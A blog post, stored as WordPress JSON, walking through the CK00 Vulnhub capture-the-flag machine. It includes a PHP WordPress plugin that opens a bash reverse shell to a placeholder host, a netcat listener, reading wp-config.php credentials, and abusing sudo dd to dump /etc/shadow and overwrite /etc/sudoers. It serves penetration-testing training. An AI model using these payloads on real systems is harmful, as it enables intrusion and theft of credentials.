{"id":25791,"date":"2020-03-31T14:27:21","date_gmt":"2020-03-31T08:57:21","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25791"},"modified":"2020-04-07T21:44:02","modified_gmt":"2020-04-07T16:14:02","slug":"ck00-vulnhub-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/","title":{"rendered":"CK00: Vulnhub Walkthrough | Infosec Warrior CTF"},"content":{"rendered":"<p>I will share with you a new Walkthrough for Vulnhub machines. CK00: Vulnhub Walkthrough for the CTF Challenge Created by Vishal Biswas AKA Cyberknight. You can download here this <a href=\"https:\/\/www.vulnhub.com\/entry\/ck-00,444\/\">CTF<\/a> . It states the level is Easy and that is true. Again, this is in the eye of the beholder but I&#8217;ve seen some boxes where Easy isn&#8217;t exactly Easy. Or maybe it&#8217;s Easy but it&#8217;s a CTF style box. This isn&#8217;t that type of box. It&#8217;s just a poorly configured machine and it has either a few rabbit holes or a few steps I just skipped because you can. Either way, you explore a little if this is unfamiliar and that&#8217;s how you learn.<\/p>\n<h3><strong><img decoding=\"async\" class=\"alignnone wp-image-25792 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-47-13-e1586276000418.png\" alt=\"ck00 login\" width=\"407\" height=\"185\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-47-13-e1586276000418.png 407w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-47-13-e1586276000418-300x136.png 300w\" sizes=\"(max-width: 407px) 100vw, 407px\" \/><\/strong><\/h3>\n<h3><strong>Penetration Testing Methodologies<\/strong><\/h3>\n<p><strong>Network Scan<\/strong><\/p>\n<ul>\n<li>Netdicover<\/li>\n<li>Nmap<\/li>\n<\/ul>\n<p><strong>Enumeration<\/strong><\/p>\n<ul>\n<li>WordPress Enumeration<\/li>\n<li>Local Hosts file entry<\/li>\n<\/ul>\n<p><strong>Exploit<\/strong><\/p>\n<ul>\n<li>\n<p class=\"card-title text-secondary text-center\">WordPress plugin php injection.<\/p>\n<\/li>\n<\/ul>\n<p><strong>Privilege Escalation<\/strong><\/p>\n<ul>\n<li>Horizontal Privilege Escalation<\/li>\n<li>wp-config.php<\/li>\n<li>sudo -l<\/li>\n<\/ul>\n<h4>Network Scanning<\/h4>\n<p>So, as we always start with <strong>netdiscover<\/strong> to get the IP of the VM machine and the IP of the host I\u2019ve found is 192.168.2.4<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">netdiscover -i vboxnet0<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25793 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-52-11.png\" alt=\"ck00 ip\" width=\"550\" height=\"118\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-52-11.png 550w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-52-11-300x64.png 300w\" sizes=\"(max-width: 550px) 100vw, 550px\" \/><\/p>\n<p>Let\u2019s proceed with network scan using Nmap aggressive scan as given below.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">nmap -p- -sC -A -O 192.168.2.4<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25794 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-54-55.png\" alt=\"ck00 nmap\" width=\"660\" height=\"447\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-54-55.png 660w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-54-55-300x203.png 300w\" sizes=\"(max-width: 660px) 100vw, 660px\" \/><\/p>\n<h3>Enumeration<\/h3>\n<p>First thing we notice is port 80 is open and we see WordPress. When we check out the port in the browser.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25795 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-10-41.png\" alt=\"ck00 wp\" width=\"738\" height=\"685\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-10-41.png 738w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-10-41-300x278.png 300w\" sizes=\"(max-width: 738px) 100vw, 738px\" \/><\/p>\n<p>We can see from the malformed page that we need to add an entry into our hosts file. When we try to access the admin page, we see what name we need to use in our hosts file<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">vim \/etc\/hosts<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25796 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-12-11.png\" alt=\"ck00 host\" width=\"419\" height=\"87\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-12-11.png 419w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-12-11-300x62.png 300w\" sizes=\"(max-width: 419px) 100vw, 419px\" \/><\/p>\n<p>Eureka !!!!!!!!!! It&#8217;s work and finally got wordpress.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25797 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-14-27.png\" alt=\"ck00 web\" width=\"944\" height=\"557\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-14-27.png 944w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-14-27-300x177.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-14-27-768x453.png 768w\" sizes=\"(max-width: 944px) 100vw, 944px\" \/><\/p>\n<p>Now when we attempt to access the admin page, with credential <strong>admin:admin<\/strong><\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25798 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-16-41.png\" alt=\"ck00 login\" width=\"365\" height=\"494\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-16-41.png 365w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-16-41-222x300.png 222w\" sizes=\"(max-width: 365px) 100vw, 365px\" \/><\/p>\n<h3>Exploit<\/h3>\n<p>When I first started hacking and I came across a WordPress set, I would try all sorts of things to get PHP code into the site. Sometimes you can upload a shell as a plugin, sometimes you can upload a shell as media, both are intentional misconfigurations, and there are plugins that also allow for PHP.<\/p>\n<p>You can just write your own <a href=\"https:\/\/sevenlayers.com\/index.php\/179-wordpress-plugin-reverse-shell\" target=\"_blank\" rel=\"noopener noreferrer\">Reverse Shell Plugin<\/a>.\u00a0 Save yourself some headaches, just make this, use it, and store it for later use.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">touch rshell.php\r\nvim rshell.php\r\n &lt;?php\r\n \r\n \/**\r\n * Plugin Name: Reverse Shell Plugin\r\n * Plugin URI:\r\n * Description: Reverse Shell Plugin\r\n * Version: 1.0\r\n * Author: Dasagreeva\r\n * Author URI: https:\/\/armourinfosec.com\r\n *\/\r\n exec(\"\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/LHOST\/LPORT 0&gt;&amp;1'\");\r\n ?&gt;\r\nzip rshellplugin.zip rshell.php<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25799 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-50-02.png\" alt=\"ck00 shell\" width=\"471\" height=\"412\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-50-02.png 471w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-50-02-300x262.png 300w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><\/p>\n<p>Once we get it zipped, we move to the <strong>WordPress UI<\/strong>. Under <strong>Plugins<\/strong>, we select <strong>Add New<\/strong><\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25800 size-large\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-51-57-1024x377.png\" alt=\"ck00 plugin\" width=\"1024\" height=\"377\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-51-57-1024x377.png 1024w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-51-57-300x111.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-51-57-768x283.png 768w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-51-57.png 1053w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>We activate our <strong>plugin<\/strong>:<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25801 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-53-40.png\" alt=\"ck00 rv\" width=\"761\" height=\"292\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-53-40.png 761w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-53-40-300x115.png 300w\" sizes=\"(max-width: 761px) 100vw, 761px\" \/><\/p>\n<p>We catch our shell. Yesssssssssssss&#8230;&#8230;&#8230;<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">nc -nlvp 1505<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25802 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-55-10.png\" alt=\"ck00 nc\" width=\"681\" height=\"253\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-55-10.png 681w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-12-55-10-300x111.png 300w\" sizes=\"(max-width: 681px) 100vw, 681px\" \/><\/p>\n<h3><strong>Privilege Escalation<\/strong><\/h3>\n<p>We look around for user flag and found it.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25803 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-01-48.png\" alt=\"ck00 wwwdata\" width=\"347\" height=\"317\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-01-48.png 347w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-01-48-300x274.png 300w\" sizes=\"(max-width: 347px) 100vw, 347px\" \/><\/p>\n<p>We then move to <strong>wp<\/strong>&#8211;<strong>config<\/strong>.<strong>php<\/strong> file for credentials.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">cat \/var\/www\/html\/wp-config.php<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25804 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-07-37.png\" alt=\"ck00 sql\" width=\"496\" height=\"478\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-07-37.png 496w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-07-37-300x289.png 300w\" sizes=\"(max-width: 496px) 100vw, 496px\" \/><\/p>\n<p>got password <strong>bla_is_my_password<\/strong><\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25805 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-16-15.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"335\" height=\"398\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-16-15.png 335w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-13-16-15-253x300.png 253w\" sizes=\"(max-width: 335px) 100vw, 335px\" \/><\/p>\n<p>Excellent! Here&#8217;s where we cut out a step or two. I saw a few things and maybe that&#8217;s how I&#8217;m supposed to get to bla1 but on a hunch, I guess the password is: <strong>bla1_is_my_password<\/strong>. I got ssh connection.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">ssh bla1@192.168.2.4<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25806 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-01-38.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"670\" height=\"242\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-01-38.png 670w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-01-38-300x108.png 300w\" sizes=\"(max-width: 670px) 100vw, 670px\" \/><\/p>\n<p>Checking out my <strong>sudo privileges<\/strong>, I learn that I can execute <strong>\/bin\/rbash as the user ck-00<\/strong> which essentially moves us into the next account.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">sudo -u ck-00 \/bin\/rbash<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25807 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-04-07.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"676\" height=\"246\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-04-07.png 676w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-04-07-300x109.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-04-07-672x246.png 672w\" sizes=\"(max-width: 676px) 100vw, 676px\" \/><\/p>\n<p>There is\u00a0 sudo privileges as our new user.We can execute <strong>\/bin\/dd<\/strong> as <strong>root<\/strong>. dd\u00a0 allows us to &#8220;convert and copy a file&#8221; and it&#8217;s used for backups. We can also use it to read and write files.We should be able to read the \/etc\/shadow file as root.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">sudo dd if=\/etc\/shadow<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25808 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-08-17.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"675\" height=\"176\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-08-17.png 675w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-08-17-300x78.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-08-17-672x176.png 672w\" sizes=\"(max-width: 675px) 100vw, 675px\" \/><\/p>\n<p>Excellent! We should also be able to write a new line into sudoers<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25809 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-10-57.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"836\" height=\"192\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-10-57.png 836w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-10-57-300x69.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-10-57-768x176.png 768w\" sizes=\"(max-width: 836px) 100vw, 836px\" \/><\/p>\n<pre class=\"toolbar:2 striped:false nums:false show-plain:3 lang:sh highlight:0 decode:true\">echo \"ck-00 ALL=(ALL) NOPASSWD: ALL\" | sudo dd of=\/etc\/sudoers<\/pre>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25812 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-40-23.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"553\" height=\"147\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-40-23.png 553w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-40-23-300x80.png 300w\" sizes=\"(max-width: 553px) 100vw, 553px\" \/><\/p>\n<p>root flag&#8230;..<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-25813 size-large\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-42-08-1024x346.png\" alt=\"CK00: Vulnhub Walkthrough\" width=\"1024\" height=\"346\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-42-08-1024x346.png 1024w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-42-08-300x101.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-42-08-768x259.png 768w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-14-42-08.png 1119w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>Conclusion: It was an easy CTF with some loop and really nice concepts. It was really helpful for beginners and people preparing for OSCP. Thank to Vishal Biswas AKA Cyberknight . I hope to see more challenges like this in the future.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I will share with you a new Walkthrough for Vulnhub machines. CK00: Vulnhub Walkthrough for the CTF Challenge Created by&#8230;<\/p>\n","protected":false},"author":1,"featured_media":25792,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[117,119,118],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec<\/title>\n<meta name=\"description\" content=\"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-31T08:57:21+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-07T16:14:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-47-13-e1586276000418.png\" \/>\n\t<meta property=\"og:image:width\" content=\"407\" \/>\n\t<meta property=\"og:image:height\" content=\"185\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/\",\"name\":\"CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-03-31T08:57:21+00:00\",\"dateModified\":\"2020-04-07T16:14:02+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CK00: Vulnhub Walkthrough | Infosec Warrior CTF\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec","description":"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec","og_description":"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.","og_url":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-03-31T08:57:21+00:00","article_modified_time":"2020-04-07T16:14:02+00:00","og_image":[{"width":407,"height":185,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/03\/Screenshot-from-2020-03-31-11-47-13-e1586276000418.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/","name":"CK00: Vulnhub Walkthrough | Infosec Warrior CTF - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-03-31T08:57:21+00:00","dateModified":"2020-04-07T16:14:02+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"CK00 Vulnhub VM Walkthrough of the CTF challenge created by Vishal Biswas AKA Cyberknight on Infosec Warrior and Vulnhub.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/ck00-vulnhub-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"CK00: Vulnhub Walkthrough | Infosec Warrior CTF"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25791"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=25791"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/25791\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/25792"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=25791"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=25791"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=25791"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}